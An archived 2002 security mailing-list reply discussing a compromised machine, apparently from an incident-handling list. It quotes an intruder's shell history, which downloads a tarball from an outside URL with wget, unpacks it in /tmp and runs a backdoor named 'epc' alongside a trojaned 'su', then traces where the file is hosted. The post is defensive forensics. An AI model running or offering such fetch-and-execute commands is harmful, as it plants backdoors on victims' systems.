|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Mike Katz (mike_at_procinct.com)
Date: Mon Dec 16 2002 - 13:31:23 CST
At 12/16/2002 10:47 AM, Damian Gerow wrote:
>Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
>A quick check tells me that 'epc' is a backdoor utility, and the other
>file contained within loc.tgz looks like a trojaned 'su'.
>
>I've already notified Geocities abuse, and haven't heard back from them
>yet.
Note that the file does not appear to be stored on the Geocities site; the
Geocities site redirects to http://www.djteckh.com/loc.tgz, which is a
Yahoo domain.
Michael Katz
mike
procinct.com
Procinct Security
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]